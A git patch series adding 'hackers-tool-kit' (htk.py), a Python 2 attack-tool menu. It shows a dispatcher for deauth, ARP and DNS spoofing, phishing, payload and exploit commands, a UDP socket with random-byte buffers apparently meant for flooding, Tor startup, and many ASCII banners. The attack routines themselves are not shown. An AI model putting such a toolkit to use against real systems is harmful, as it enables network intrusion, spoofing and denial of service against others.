cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - if x == "update": - update() - if x == "compilec": - compilec() - if x == "dnsspoof": - dnsspoof() - if x == "dnsspoofall": - dnsspoofall() - if x == "htk-lite": - os.system("python /root/hackers-tool-kit/htk-lite/htkl.py") - if x == "reboot": - reboot() - if x == "specscan": - specscan() - - except: - print "\nfollow @tuf_unkn0wn on instagram" - print "\nExiting..." - break - os.system("service tor stop") - os.system("service postgresql stop") - found = True - -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 12991889db1f6843dde82e7da4b4cdfb50740da5 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 22 Apr 2020 04:44:56 -0400 Subject: [PATCH 214/214] Add files via upload --- htk.py | 3502 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3502 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..70e361b --- /dev/null +++ b/htk.py @@ -0,0 +1,3502 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" + + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +import readline +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' + +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ 